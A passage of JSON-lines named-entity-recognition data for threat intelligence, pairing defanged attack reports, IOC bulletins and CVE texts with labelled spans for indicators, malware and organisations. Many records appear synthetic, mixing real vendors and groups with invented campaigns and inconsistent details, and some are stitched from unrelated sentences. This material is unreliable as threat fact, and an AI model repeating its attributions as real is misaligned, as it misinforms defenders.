The threat actor, believed to be Lazarus Group, used Brute Ratel for credential harvesting and BloodHound for lateral movement. Exfiltrated data was sent to proxyapi[.]site and login-cloud[ . ]info. The initial dropper (SHA1: dc826857b57b6e8dd5b7a84ab9095cd7c98c725f) was delivered via a phishing email from notification@login-portal[ . ]tech. A second C2 node was observed at 101[.]80[.]56[.]34, with a persistence mechanism writing to C:\\Users\\admin\\Downloads\\implant.so.", "spans": {"Indicator: 133.5.87.84": [[64, 93]], "Organization: Trend Micro": [[99, 110]], "Malware: PikaBot": [[130, 137]], "Indicator: proxyapi.site": [[348, 363]], "Indicator: login-cloud.info": [[368, 388]], "Indicator: dc826857b57b6e8dd5b7a84ab9095cd7c98c725f": [[417, 457]], "Indicator: notification@login-portal.tech": [[499, 533]], "Indicator: 101.80.56.34": [[568, 586]]}, "info": {"id": "synth_v2_00311", "source": "defanged_augment"}} {"text": "Volexity published a threat intelligence report linking TA505 to a new campaign exploiting CVE-2026-44676 in Citrix NetScaler. The attackers deployed XLoader via WinPEAS, establishing C2 communication with 172[.]111[.]29[.]149 and nodenode[.]org. A secondary payload was downloaded from hxxp://node-api[ . ]live/api/v2/auth. The malware binary (SHA1: 097e31987e1382d795ec15b2a2f758cf402ed1d6) was dropped to C:\\ProgramData\\helper.sh. Phishing emails were sent from service@secure-verify[.]net targeting enterprise users. 
A backup C2 server was identified at 192[.]160[.]29[.]13.", "spans": {"Organization: Volexity": [[0, 8]], "Vulnerability: CVE-2026-44676": [[91, 105]], "System: Citrix NetScaler": [[109, 125]], "Malware: XLoader": [[150, 157]], "Indicator: 172.111.29.149": [[206, 226]], "Indicator: nodenode.org": [[231, 245]], "Indicator: hxxp://node-api.live/api/v2/auth": [[287, 323]], "Indicator: 097e31987e1382d795ec15b2a2f758cf402ed1d6": [[351, 391]], "Indicator: service@secure-verify.net": [[465, 492]], "Indicator: 192.160.29.13": [[558, 577]]}, "info": {"id": "synth_v2_00005", "source": "defanged_augment"}} {"text": "The Lazarus Group was first identified in Novetta’s report Operation Blockbuster in February 2016 . The Silence[ . ]Main Trojan , which is the main stage of the attack , has a full set of commands to control a compromised computer .", "spans": {"Organization: Novetta’s": [[42, 51]], "Indicator: Silence.Main Trojan": [[104, 127]]}, "info": {"id": "cyberner_stix_train_007030", "source": "defanged_augment"}} {"text": "Infrastructure FTP server The attackers used ftp : //213.174.157 [ . In one of the samples received for analysis , the US-CERT Code Analysis Team observed botnet controller functionality . APT33 : 91[.]235[.]142[.]76 mywinnetwork[ . ]ddns[ . ]net . It supports loading arbitrary .NET assemblies encoded as Base64 sent to it via chat comments .", "spans": {"Organization: US-CERT Code Analysis Team": [[119, 145]], "Malware: botnet controller": [[155, 172]], "Indicator: 91.235.142.76": [[197, 216]], "Indicator: mywinnetwork.ddns.net": [[217, 246]]}, "info": {"id": "cyberner_stix_train_003583", "source": "defanged_augment"}} {"text": "Forensic Investigation Notes: Analysis of the compromised host revealed Mimikatz artifacts at C:\\Windows\\Temp\\shell.php. Memory dump analysis confirmed execution of PowerShell Empire. Registry modifications pointed to persistence via /etc/cron.d/runtime.dll. 
Network forensics identified connections to 172[.]22[.]165[.]235 and storage-auth[ . ]live. Email headers traced the initial vector to info@auth-check[.]org. File C:\\Windows\\Tasks\\config.dat (SHA256: 4bf4c62d0406287a63ebac6599b1e026d392671bb6d6f0e7c30b367bdbb0621c) was identified as the initial dropper. A staging URL hxxp://storageedge[.]live/login resolved to 172[.]24[.]64[.]64. Secondary artifact hash: SHA256: 0275a4e5f4a35de4bfbf652741de4a489c4e4b4e5bc0a34ef4e09fa66cf4995b.", "spans": {"Indicator: 172.22.165.235": [[303, 323]], "Indicator: storage-auth.live": [[328, 349]], "Indicator: info@auth-check.org": [[394, 415]], "Indicator: 4bf4c62d0406287a63ebac6599b1e026d392671bb6d6f0e7c30b367bdbb0621c": [[459, 523]], "Indicator: http://storageedge.live/login": [[578, 609]], "Indicator: 172.24.64.64": [[622, 640]], "Indicator: 0275a4e5f4a35de4bfbf652741de4a489c4e4b4e5bc0a34ef4e09fa66cf4995b": [[675, 739]]}, "info": {"id": "synth_v2_01214", "source": "defanged_augment"}} {"text": "Phishing Campaign Report: Kaspersky GReAT identified a large-scale phishing operation. Emails originated from alert@auth-check[ . ]org and finance@identity-verify[ . ]cc, spoofing legitimate services. Victims were directed to hxxps://proxy-mail[.]link/panel/index.html which hosted a credential harvesting page on apicdn[.]info. A secondary link hxxps://cloud-node[ . ]club/portal/verify delivered QakBot (SHA256: 1291e92e5bbba173be68a34922734af05b541ae39c6ac00fa6f54be47e0907f8). 
The malware was saved to C:\\ProgramData\\csrss.exe and established C2 with 99[.]174[.]38[.]176.", "spans": {"Organization: Kaspersky GReAT": [[26, 41]], "Indicator: alert@auth-check.org": [[110, 134]], "Indicator: finance@identity-verify.cc": [[139, 169]], "Indicator: hxxps://proxy-mail.link/panel/index.html": [[226, 268]], "Indicator: apicdn.info": [[314, 327]], "Indicator: hxxps://cloud-node.club/portal/verify": [[346, 387]], "Malware: QakBot": [[398, 404]], "Indicator: 1291e92e5bbba173be68a34922734af05b541ae39c6ac00fa6f54be47e0907f8": [[414, 478]], "Indicator: 99.174.38.176": [[555, 574]]}, "info": {"id": "synth_v2_01082", "source": "defanged_augment"}} {"text": "A backdoor also known as: Trojan.Bebloh.Win32.427 Win32.Trojan.WisdomEyes.16070401.9500.9999 W32/Injector.CMX TROJ_HPISDA.SM2 Trojan.Win32.NaKocTb.eiktob Trojan.Win32.Inject.213504 Troj.W32.Inject.tn8S BackDoor.Bebloh.272 TROJ_HPISDA.SM2 BehavesLike[.]Win32[.]Downloader[.]ch W32/Injector.UCTI-2382 Trojan.Inject.tpn Trojan/Win32.Inject Trojan.Strictor.D1C966 Backdoor:Win32/Carrotime.A Trojan/Win32.Inject.C1667127 Trj/RansomCrypt.J W32/Kryptik.FJVT!tr", "spans": {"Malware: backdoor": [[2, 10]], "Indicator: BehavesLike.Win32.Downloader.ch": [[238, 275]]}, "info": {"id": "cyner2_train_005381", "source": "defanged_augment"}} {"text": "Files Description CMDS * .txt Text files with commands to execute supersu.apk SuperSU ( eu.chainfire.supersu , https : //play[.]google[.]com/store/apps/details ? Working with U.S. Government partners , DHS and FBI identified Trojan malware variants used by the North Korean government - referred to by the U.S. Government as BADCALL . APT33 : 213 [ . ] 252 [ . ] 244 [ . ] 14 service-avant[ . ]com . Individuals who have access to critical information or systems can easily choose to misuse that accessto the detriment of their organization .", "spans": {"Organization: U.S. 
Government": [[175, 190], [306, 321]], "Organization: DHS": [[202, 205]], "Organization: FBI": [[210, 213]], "Indicator: 213.252.244.14": [[343, 375]], "Indicator: service-avant.com": [[376, 397]], "Indicator: play.google.com": [[121, 140]]}, "info": {"id": "cyberner_stix_train_002118", "source": "defanged_augment"}} {"text": "In the quadrant , the smaller boxes in blue-gray represent particular apps in the RuMMS family , while the bigger boxes in deep-blue represent C2 servers used by some RuMMS apps . The OilRig group continues to be a persistent adversary group in the Middle East region . The oldest one from November 2019 , named \" Urgent[.]docx \" . Mandiant has identified zero - day exploitation of this vulnerability in the wild beginning in late August 2023 as well as n - day exploitation after Citrix ’s publication .", "spans": {"Malware: RuMMS": [[82, 87], [167, 172]], "Indicator: Urgent.docx": [[314, 327]], "Organization: Mandiant": [[332, 340]], "Vulnerability: zero - day exploitation": [[356, 379]]}, "info": {"id": "cyberner_stix_train_004081", "source": "defanged_augment"}} {"text": "In this latest incident , the group registered a fake news domain , timesofindiaa[ . ]in , on May 18 , 2016 , and then used it to send spear phishing emails to Indian government officials on the same day . This article is an attempt to share this experience with other experts , particularly the IT security specialists in companies and financial institutions that increasingly find themselves the targets of cyber-attacks .", "spans": {"Organization: government officials": [[167, 187]], "Organization: IT": [[296, 298]], "Organization: financial institutions": [[337, 359]], "Indicator: timesofindiaa.in": [[68, 88]]}, "info": {"id": "cyberner_stix_train_004369", "source": "defanged_augment"}} {"text": "Malware Analysis Report: AgentTesla (SHA256: df677d572c40267397d1aeb027a00e9f84eebe9c2959fd3754667e818bec7d32). 
Upon execution on VMware ESXi, the sample creates /opt/app/bin/dropper.ps1 and injects into legitimate processes. Network analysis shows beaconing to 17[.]57[.]243[.]119 every 60 seconds and DNS queries to edgerelay[ . ]org. The second stage was fetched from hxxps://backup-proxy[.]online/download/update.exe and written to /etc/cron.d/implant.so. The payload uses PowerView-style techniques for defense evasion. A secondary hash (SHA256: 226710d90e5377a0c1b18f2ee7065fbfcbb471561c3756d0c8e69202a0995a6f) was extracted from the unpacked payload.", "spans": {"Malware: AgentTesla": [[25, 35]], "Indicator: df677d572c40267397d1aeb027a00e9f84eebe9c2959fd3754667e818bec7d32": [[45, 109]], "System: VMware ESXi": [[130, 141]], "Indicator: 17.57.243.119": [[262, 281]], "Indicator: edgerelay.org": [[318, 335]], "Indicator: https://backup-proxy.online/download/update.exe": [[371, 420]], "Indicator: 226710d90e5377a0c1b18f2ee7065fbfcbb471561c3756d0c8e69202a0995a6f": [[551, 615]]}, "info": {"id": "synth_v2_00498", "source": "defanged_augment"}} {"text": "The system verifies the signature of the legitimate file while installing the malicious file . There has also been at least one victim targeted by a spear-phishing attack . In the case we examined , the path was C:\\ProgramData\\DRM\\CLR\\CLR[.]exe . The campaign started in at least June 2023 , and the ransom note appears to mimic certain aspects of the ransom note used in the global WannaCry attacks from 2017 .", "spans": {"Indicator: C:\\ProgramData\\DRM\\CLR\\CLR.exe": [[212, 244]]}, "info": {"id": "cyberner_stix_train_000071", "source": "defanged_augment"}} {"text": "Sophos X-Ops published a threat intelligence report linking FIN11 to a new campaign exploiting CVE-2025-46789 in Citrix NetScaler. The attackers deployed Play via CrackMapExec, establishing C2 communication with 192 [ . ] 195 [ . ] 116 [ . ] 107 and staticstorage[.]online. A secondary payload was downloaded from hxxp://cloud-login[.]cc/download/update.exe. 
The malware binary (MD5: 5005f8b01c76b47a142bb13e4b40d2a0) was dropped to C:\\Windows\\System32\\ntds.dit. Phishing emails were sent from noreply@document-share[ . ]link targeting enterprise users. A backup C2 server was identified at 192 [ . ] 78 [ . ] 218 [ . ] 249.", "spans": {"Organization: Sophos X-Ops": [[0, 12]], "Vulnerability: CVE-2025-46789": [[95, 109]], "System: Citrix NetScaler": [[113, 129]], "Malware: Play": [[154, 158]], "Indicator: 192.195.116.107": [[212, 245]], "Indicator: staticstorage.online": [[250, 272]], "Indicator: hxxp://cloud-login.cc/download/update.exe": [[314, 357]], "Indicator: 5005f8b01c76b47a142bb13e4b40d2a0": [[384, 416]], "Indicator: noreply@document-share.link": [[494, 525]], "Indicator: 192.78.218.249": [[591, 623]]}, "info": {"id": "synth_v2_00192", "source": "defanged_augment"}} {"text": "Trend Micro published a threat intelligence report linking Forest Blizzard to a new campaign exploiting CVE-2021-24446 in Cisco ASA. The attackers deployed SmokeLoader via PsExec, establishing C2 communication with 20[.]91[.]243[.]81 and proxy-cloud[ . ]xyz. A secondary payload was downloaded from hxxp://sync-cloud[ . ]xyz/wp-content/uploads/doc.php. The malware binary (SHA1: b9daf676c4627c3af9af734000aeea6542a64e70) was dropped to /etc/cron.d/payload.bin. Phishing emails were sent from alert@secure-verify[ . ]net targeting enterprise users. 
A backup C2 server was identified at 56[.]137[.]93[.]243.", "spans": {"Organization: Trend Micro": [[0, 11]], "Vulnerability: CVE-2021-24446": [[104, 118]], "System: Cisco ASA": [[122, 131]], "Malware: SmokeLoader": [[156, 167]], "Indicator: 20.91.243.81": [[215, 233]], "Indicator: proxy-cloud.xyz": [[238, 257]], "Indicator: hxxp://sync-cloud.xyz/wp-content/uploads/doc.php": [[299, 351]], "Indicator: b9daf676c4627c3af9af734000aeea6542a64e70": [[379, 419]], "Indicator: alert@secure-verify.net": [[492, 519]], "Indicator: 56.137.93.243": [[585, 604]]}, "info": {"id": "synth_v2_00166", "source": "defanged_augment"}} {"text": "Phishing Campaign Report: NCSC identified a large-scale phishing operation. Emails originated from confirm@urgent-notice[ . ]online and alert@mail-service[.]info, spoofing legitimate services. Victims were directed to hxxp://api-static[ . ]org/collect which hosted a credential harvesting page on cacheedge[.]top. A secondary link hxxps://gatewayauth[.]online/secure/token delivered BumbleBee (SHA1: 5c4958bd7bcec41bf43116da1bac4fe213d801c1). The malware was saved to /home/user/.config/csrss.exe and established C2 with 46 [ . ] 8 [ . ] 77 [ . ] 180.", "spans": {"Organization: NCSC": [[26, 30]], "Indicator: confirm@urgent-notice.online": [[99, 131]], "Indicator: alert@mail-service.info": [[136, 161]], "Indicator: http://api-static.org/collect": [[218, 251]], "Indicator: cacheedge.top": [[297, 312]], "Indicator: hxxps://gatewayauth.online/secure/token": [[331, 372]], "Malware: BumbleBee": [[383, 392]], "Indicator: 5c4958bd7bcec41bf43116da1bac4fe213d801c1": [[400, 440]], "Indicator: 46.8.77.180": [[521, 550]]}, "info": {"id": "synth_v2_00874", "source": "defanged_augment"}} {"text": "IOC Bulletin - Hive Campaign:\nNetwork Indicators:\n- 172[.]207[.]86[.]136\n- 172[.]236[.]238[.]211\n- 218 [ . ] 253 [ . ] 25 [ . ] 22\n- cacherelay[ . ]org\n- nodelogin[.]dev\nURLs:\n- hxxp://gatewaystatic[ . ]dev/portal/verify\n- hxxp://updateproxy[ . 
]online/admin/config\nEmail Senders:\n- ceo@document-share[.]link\n- it@identity-verify[.]cc\nFile Indicators:\n- SHA256: b2e8b42d7488ffc3ed65fe94f7748b7df0227c8c5e05d74360f5400c35490242\n- SHA256: 9dc3b4790af4f3e8359a4fc0a5aa0f948b1d62fa37d5ebe7fdc379644ce29eea\n- Drop path: C:\\Users\\Public\\Documents\\shell.php", "spans": {"Malware: Hive": [[15, 19]], "Indicator: 172.207.86.136": [[52, 72]], "Indicator: 172.236.238.211": [[75, 96]], "Indicator: 218.253.25.22": [[99, 130]], "Indicator: cacherelay.org": [[133, 151]], "Indicator: nodelogin.dev": [[154, 169]], "Indicator: http://gatewaystatic.dev/portal/verify": [[178, 220]], "Indicator: hxxp://updateproxy.online/admin/config": [[223, 265]], "Indicator: ceo@document-share.link": [[283, 308]], "Indicator: it@identity-verify.cc": [[311, 334]], "Indicator: b2e8b42d7488ffc3ed65fe94f7748b7df0227c8c5e05d74360f5400c35490242": [[362, 426]], "Indicator: 9dc3b4790af4f3e8359a4fc0a5aa0f948b1d62fa37d5ebe7fdc379644ce29eea": [[437, 501]]}, "info": {"id": "synth_v2_01374", "source": "defanged_augment"}} {"text": "Before attempting to deploy the publicly available Ransomware-as-a-Service (RaaS) Encryptor RaaS through group policy , APT41 blocked victim systems from retrieving anti-virus updates by accessing the DNS management console and implementing a forward lookup on the domain used for anti-virus updates to the park IP address 1[.]1[.]1[.]1 .", "spans": {"Indicator: 1.1.1.1": [[323, 336]]}, "info": {"id": "dnrti_train_003103", "source": "defanged_augment"}} {"text": "Blog Post by Cisco Talos: Tracking Storm-0558's Latest Operations. Our research team has uncovered a new campaign leveraging CVE-2025-46789 against Barracuda ESG deployments. The initial access vector involves spear-phishing emails from billing@document-share[ . ]link delivering Latrodectus. Post-compromise, the attackers deploy Dridex and use Seatbelt for reconnaissance. C2 infrastructure includes 10[.]148[.]21[.]114 and proxy-cloud[ . ]com. 
A staging server at hxxp://apisync[.]link/collect hosts additional tooling. Key artifact: C:\\Windows\\Temp\\implant.so (SHA256: 475242e819fcd357b0b5d78c9b6e6f410039cd4d3d5695019321bbe14316c093).", "spans": {"Organization: Cisco Talos": [[13, 24]], "Vulnerability: CVE-2025-46789": [[125, 139]], "System: Barracuda ESG": [[148, 161]], "Indicator: billing@document-share.link": [[237, 268]], "Malware: Latrodectus": [[280, 291]], "Malware: Dridex": [[331, 337]], "Indicator: 10.148.21.114": [[402, 421]], "Indicator: proxy-cloud.com": [[426, 445]], "Indicator: hxxp://apisync.link/collect": [[467, 496]], "Indicator: 475242e819fcd357b0b5d78c9b6e6f410039cd4d3d5695019321bbe14316c093": [[573, 637]]}, "info": {"id": "synth_v2_01572", "source": "defanged_augment"}} {"text": "] top/ Oct 23 , 2017 hxxp : //online[.]bankaustria[.]at.id8817469 [ .", "spans": {"Indicator: online.bankaustria.at": [[30, 55]]}, "info": {"id": "cyner_train_002694", "source": "defanged_augment"}} {"text": "IOC Bulletin - RedLine Stealer Campaign:\nNetwork Indicators:\n- 10[.]135[.]38[.]140\n- 10[.]179[.]95[.]183\n- 99 [ . ] 82 [ . ] 184 [ . ] 38\n- secure-api[ . ]xyz\n- auth-gateway[ . ]online\nURLs:\n- hxxp://securenode[ . ]dev/download/update.exe\n- hxxps://proxyupdate[ . 
]net/callback\nEmail Senders:\n- updates@urgent-notice[.]online\n- alert@secure-verify[.]net\nFile Indicators:\n- SHA1: b4bbff27cbeef0ca0ca2637799972820e3572c06\n- MD5: 606bb0202afe86276cb24369610ec191\n- Drop path: C:\\Program Files\\Common Files\\sam.hive", "spans": {"Malware: RedLine Stealer": [[15, 30]], "Indicator: 10.135.38.140": [[63, 82]], "Indicator: 10.179.95.183": [[85, 104]], "Indicator: 99.82.184.38": [[107, 137]], "Indicator: secure-api.xyz": [[140, 158]], "Indicator: auth-gateway.online": [[161, 184]], "Indicator: hxxp://securenode.dev/download/update.exe": [[193, 238]], "Indicator: hxxps://proxyupdate.net/callback": [[241, 277]], "Indicator: updates@urgent-notice.online": [[295, 325]], "Indicator: alert@secure-verify.net": [[328, 353]], "Indicator: b4bbff27cbeef0ca0ca2637799972820e3572c06": [[379, 419]], "Indicator: 606bb0202afe86276cb24369610ec191": [[427, 459]]}, "info": {"id": "synth_v2_01438", "source": "defanged_augment"}} {"text": "Adversaries may use InstallUtil to proxy execution of code through a trusted Windows utility. InstallUtil is a command-line utility that allows for installation and uninstallation of resources by executing specific installer components specified in .NET binaries. The InstallUtil binary may also be digitally signed by Microsoft and located in the .NET directories on a Windows system: C:\\Windows\\Microsoft[ . ]NET\\Framework\\v\\InstallUtil.exe and C:\\Windows\\Microsoft[ . 
]NET\\Framework64\\v\\InstallUtil.exe.\n\nInstallUtil may also be used to bypass application control through use of attributes within the binary that execute the class decorated with the attribute [System.ComponentModel.RunInstaller(true)].", "spans": {"System: Windows": [[77, 84]], "System: .NET": [[249, 253]], "Organization: Microsoft": [[320, 329]], "Indicator: Microsoft.NET": [[398, 415], [468, 485]]}, "info": {"source": "defanged_augment", "mitre_id": "T1218.004"}} {"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nmlxbf_gige: stop interface during shutdown\n\nThe mlxbf_gige driver intermittantly encounters a NULL pointer\nexception while the system is shutting down via \"reboot\" command.\nThe mlxbf_driver will experience an exception right after executing\nits shutdown() method. One example of this exception is:\n\nUnable to handle kernel NULL pointer dereference at virtual address 0000000000000070\nMem abort info:\n ESR = 0x0000000096000004\n EC = 0x25: DABT (current EL), IL = 32 bits\n SET = 0, FnV = 0\n EA = 0, S1PTW = 0\n FSC = 0x04: level 0 translation fault\nData abort info:\n ISV = 0, ISS = 0x00000004\n CM = 0, WnR = 0\nuser pgtable: 4k pages, 48-bit VAs, pgdp=000000011d373000\n[0000000000000070] pgd=0000000000000000, p4d=0000000000000000\nInternal error: Oops: 96000004 [#1] SMP\nCPU: 0 PID: 13 Comm: ksoftirqd/0 Tainted: G S OE 5.15.0-bf.6.gef6992a #1\nHardware name: hxxps://www[.]mellanox[.]com BlueField SoC/BlueField SoC, BIOS 4.0.2.12669 Apr 21 2023\npstate: 20400009 (nzCv daif +PAN -UAO -TCO -DIT -SSBS BTYPE=--)\npc : mlxbf_gige_handle_tx_complete+0xc8/0x170 [mlxbf_gige]\nlr : mlxbf_gige_poll+0x54/0x160 [mlxbf_gige]\nsp : ffff8000080d3c10\nx29: ffff8000080d3c10 x28: ffffcce72cbb7000 x27: ffff8000080d3d58\nx26: ffff0000814e7340 x25: ffff331cd1a05000 x24: ffffcce72c4ea008\nx23: ffff0000814e4b40 x22: ffff0000814e4d10 x21: ffff0000814e4128\nx20: 0000000000000000 x19: ffff0000814e4a80 x18: ffffffffffffffff\nx17: 
000000000000001c x16: ffffcce72b4553f4 x15: ffff80008805b8a7\nx14: 0000000000000000 x13: 0000000000000030 x12: 0101010101010101\nx11: 7f7f7f7f7f7f7f7f x10: c2ac898b17576267 x9 : ffffcce720fa5404\nx8 : ffff000080812138 x7 : 0000000000002e9a x6 : 0000000000000080\nx5 : ffff00008de3b000 x4 : 0000000000000000 x3 : 0000000000000001\nx2 : 0000000000000000 x1 : 0000000000000000 x0 : 0000000000000000\nCall trace:\n mlxbf_gige_handle_tx_complete+0xc8/0x170 [mlxbf_gige]\n mlxbf_gige_poll+0x54/0x160 [mlxbf_gige]\n __napi_poll+0x40/0x1c8\n net_rx_action+0x314/0x3a0\n __do_softirq+0x128/0x334\n run_ksoftirqd+0x54/0x6c\n smpboot_thread_fn+0x14c/0x190\n kthread+0x10c/0x110\n ret_from_fork+0x10/0x20\nCode: 8b070000 f9000ea0 f95056c0 f86178a1 (b9407002)\n---[ end trace 7cc3941aa0d8e6a4 ]---\nKernel panic - not syncing: Oops: Fatal exception in interrupt\nKernel Offset: 0x4ce722520000 from 0xffff800008000000\nPHYS_OFFSET: 0x80000000\nCPU features: 0x000005c1,a3330e5a\nMemory Limit: none\n---[ end Kernel panic - not syncing: Oops: Fatal exception in interrupt ]---\n\nDuring system shutdown, the mlxbf_gige driver's shutdown() is always executed.\nHowever, the driver's stop() method will only execute if networking interface\nconfiguration logic within the Linux distribution has been setup to do so.\n\nIf shutdown() executes but stop() does not execute, NAPI remains enabled\nand this can lead to an exception if NAPI is scheduled while the hardware\ninterface has only been partially deinitialized.\n\nThe networking interface managed by the mlxbf_gige driver must be properly\nstopped during system shutdown so that IFF_UP is cleared, the hardware\ninterface is put into a clean state, and NAPI is fully deinitialized.", "spans": {"Indicator: https://www.mellanox.com": [[944, 972]], "System: Linux kernel": [[7, 19]], "System: Linux": [[2718, 2723]], "Vulnerability: NULL pointer dereference": [[393, 417]]}, "info": {"source": "defanged_augment", "cve_id": "CVE-2024-35885"}} {"text": "Malware 
Analysis Report: BlackCat (SHA256: a2837586defebc5f521c6637fd98afa5f4fa8cbbe82e0122671bdb47e5d4f1e2). Upon execution on MOVEit Transfer, the sample creates /tmp/ntds.dit and injects into legitimate processes. Network analysis shows beaconing to 192 [ . ] 188 [ . ] 152 [ . ] 30 every 60 seconds and DNS queries to portalportal[ . ]info. The second stage was fetched from hxxp://updatestorage[.]online/login and written to C:\\Windows\\System32\\sam.hive. The payload uses Havoc-style techniques for defense evasion. A secondary hash (SHA256: 0d9601027c507910bee629f13b57523d7434ba9dee24d933013c0728429f48cc) was extracted from the unpacked payload.", "spans": {"Malware: BlackCat": [[25, 33]], "Indicator: a2837586defebc5f521c6637fd98afa5f4fa8cbbe82e0122671bdb47e5d4f1e2": [[43, 107]], "System: MOVEit Transfer": [[128, 143]], "Indicator: 192.188.152.30": [[253, 285]], "Indicator: portalportal.info": [[322, 343]], "Indicator: hxxp://updatestorage.online/login": [[379, 414]], "Indicator: 0d9601027c507910bee629f13b57523d7434ba9dee24d933013c0728429f48cc": [[547, 611]]}, "info": {"id": "synth_v2_00601", "source": "defanged_augment"}} {"text": "Vulnerability Advisory: CVE-2022-34807 is a critical cross-site scripting affecting Fortinet FortiGate. Microsoft MSRC confirmed active exploitation by Gamaredon in the wild. Exploitation delivers IcedID (SHA256: 7098c8a6063d5b46574f7562136200aafd24c2c5205ab16d424a1d97131f4e5a) which is dropped to C:\\Users\\admin\\Desktop\\svchost.exe. The exploit payload is hosted at hxxp://proxybackup[ . ]site/secure/token and communicates to 47 [ . ] 231 [ . ] 219 [ . 
] 247 for C2.", "spans": {"Vulnerability: CVE-2022-34807": [[24, 38]], "Vulnerability: cross-site scripting": [[53, 73]], "System: Fortinet FortiGate": [[84, 102]], "Organization: Microsoft MSRC": [[104, 118]], "Malware: IcedID": [[197, 203]], "Indicator: 7098c8a6063d5b46574f7562136200aafd24c2c5205ab16d424a1d97131f4e5a": [[213, 277]], "Indicator: hxxp://proxybackup.site/secure/token": [[368, 408]], "Indicator: 47.231.219.247": [[429, 461]]}, "info": {"id": "synth_v2_00756", "source": "defanged_augment"}} {"text": "In September 2024, Kaspersky researchers documented coordinated attacks by Head Mare and Twelve against Russian organizations. Head Mare deployed CobInt, previously exclusive to Twelve, and their custom backdoor PhantomJitter. The attackers used LockBit 3.0 for Windows ransomware encryption and Babuk for NAS ransomware. Credential dumping relied on mimikatz, secretsdump, and ProcDump. Tunneling was achieved via cloudflared, Gost, Localtonet, ngrok, and revsocks. The C2 domain 360nvidia[ . ]com resolved to 45 [ . ] 156 [ . ] 27 [ . ] 115, with additional C2 servers at 45 [ . ] 156 [ . ] 21 [ . ] 148, 45 [ . ] 87 [ . ] 246 [ . ] 34, 185[.]158[.]248[.]107, 185 [ . ] 229 [ . ] 9 [ . ] 27, and 64 [ . ] 7 [ . ] 198 [ . ] 109. Another C2 domain was web-telegram[ . ]uk. PhantomJitter was downloaded from hxxp://45[ . ]87[ . ]246[ . ]34:443/calc.exe and hxxp://185[.]158[.]248[.]107:443/calc.exe. The attackers exploited CVE-2023-38831 in WinRAR and CVE-2021-26855 in Microsoft Exchange. Persistence used services named winsw and winuac. Malicious files were placed at C:\\Windows\\System32\\winsw.exe, C:\\ProgramData\\MicrosoftDrive\\mcdrive.vbs, and C:\\Windows\\System32\\inetsrv\\calc.exe. Lateral movement relied on PSExec, smbexec, and wmiexec. Network scanning used fscan and SoftPerfect Network Scanner. 
Data exfiltration used rclone through SFTP.", "spans": {"Organization: Kaspersky": [[19, 28]], "Malware: CobInt": [[146, 152]], "Malware: PhantomJitter": [[212, 225], [773, 786]], "Malware: LockBit 3.0": [[246, 257]], "Malware: Babuk": [[296, 301]], "Indicator: 360nvidia.com": [[481, 498]], "Indicator: 45.156.27.115": [[511, 542]], "Indicator: 45.156.21.148": [[574, 605]], "Indicator: 45.87.246.34": [[607, 637]], "Indicator: 185.158.248.107": [[639, 660]], "Indicator: 185.229.9.27": [[662, 692]], "Indicator: 64.7.198.109": [[698, 728]], "Indicator: web-telegram.uk": [[752, 771]], "Indicator: http://45.87.246.34:443/calc.exe": [[807, 851]], "Indicator: http://185.158.248.107:443/calc.exe": [[856, 897]], "Vulnerability: CVE-2023-38831": [[923, 937]], "System: WinRAR": [[941, 947]], "Vulnerability: CVE-2021-26855": [[952, 966]], "System: Microsoft Exchange": [[970, 988]]}, "info": {"id": "malware_00001", "source": "defanged_augment"}} {"text": "Forensic Investigation Notes: Analysis of the compromised host revealed Ligolo artifacts at /opt/app/bin/implant.so. Memory dump analysis confirmed execution of PowerView. Registry modifications pointed to persistence via C:\\Users\\Public\\Documents\\beacon.dll. Network forensics identified connections to 32 [ . ] 103 [ . ] 2 [ . ] 10 and backupstatic[.]top. Email headers traced the initial vector to service@urgent-notice[ . ]online. File C:\\Users\\admin\\Desktop\\winlogon.exe (SHA256: c8d1cfcb22d50aa34fd40e7c62b855957fe926c728c17877116891b69b795192) was identified as the initial dropper. A staging URL hxxps://gatewayrelay[.]cc/gate.php resolved to 71 [ . ] 69 [ . ] 233 [ . ] 55. 
Secondary artifact hash: MD5: 63d2cf9b70a62ca2470dfdea68f8dff7.", "spans": {"Indicator: 32.103.2.10": [[304, 333]], "Indicator: backupstatic.top": [[338, 356]], "Indicator: service@urgent-notice.online": [[401, 433]], "Indicator: c8d1cfcb22d50aa34fd40e7c62b855957fe926c728c17877116891b69b795192": [[485, 549]], "Indicator: https://gatewayrelay.cc/gate.php": [[604, 638]], "Indicator: 71.69.233.55": [[651, 681]], "Indicator: 63d2cf9b70a62ca2470dfdea68f8dff7": [[713, 745]]}, "info": {"id": "synth_v2_01140", "source": "defanged_augment"}} {"text": "When a victim tries to access the URL in the SMS body , the C2 will check if the mobile device meets the criteria to receive the malware ( see infrastructure section ) . APT10 withdrew from direct targeting using Poison Ivy in 2013 and conducted its first known retooling operation , upgrading its capabilities and replatforming to use PlugX . OceanLotus : background[ . ]ristians[ . ]com:8888 11b4 . They contain some invalid URLs and IPs .", "spans": {"Indicator: background.ristians.com:8888": [[357, 393]]}, "info": {"id": "cyberner_stix_train_005272", "source": "defanged_augment"}} {"text": "Forensic Investigation Notes: Analysis of the compromised host revealed Mythic artifacts at C:\\Windows\\System32\\runtime.dll. Memory dump analysis confirmed execution of Covenant. Registry modifications pointed to persistence via /opt/app/bin/sam.hive. Network forensics identified connections to 24[.]69[.]175[.]63 and syncsync[.]io. Email headers traced the initial vector to confirm@auth-check[ . ]org. File C:\\Users\\admin\\Desktop\\winlogon.exe (SHA256: b86e29372fdc04cd8ef14e6b2160d1838f222c2b1948bc4ce94095a243a58a6b) was identified as the initial dropper. A staging URL hxxps://edgeproxy[ . ]link/wp-content/uploads/doc.php resolved to 184 [ . ] 24 [ . ] 16 [ . ] 202. 
Secondary artifact hash: SHA1: b05554c70364f2f60a798729b13872fe29f2ce54.", "spans": {"Indicator: 24.69.175.63": [[296, 314]], "Indicator: syncsync.io": [[319, 332]], "Indicator: confirm@auth-check.org": [[377, 403]], "Indicator: b86e29372fdc04cd8ef14e6b2160d1838f222c2b1948bc4ce94095a243a58a6b": [[455, 519]], "Indicator: https://edgeproxy.link/wp-content/uploads/doc.php": [[574, 627]], "Indicator: 184.24.16.202": [[640, 671]], "Indicator: b05554c70364f2f60a798729b13872fe29f2ce54": [[704, 744]]}, "info": {"id": "synth_v2_01198", "source": "defanged_augment"}} {"text": "sigstore framework is a common go library shared across sigstore services and clients. In versions 1.10.3 and below, the legacy TUF client (pkg/tuf/client.go) supports caching target files to disk. It constructs a filesystem path by joining a cache base directory with a target name sourced from signed target metadata; however, it does not validate that the resulting path stays within the cache base directory. A malicious TUF repository can trigger arbitrary file overwriting, limited to the permissions that the calling process has. Note that this should only affect clients that are directly using the TUF client in 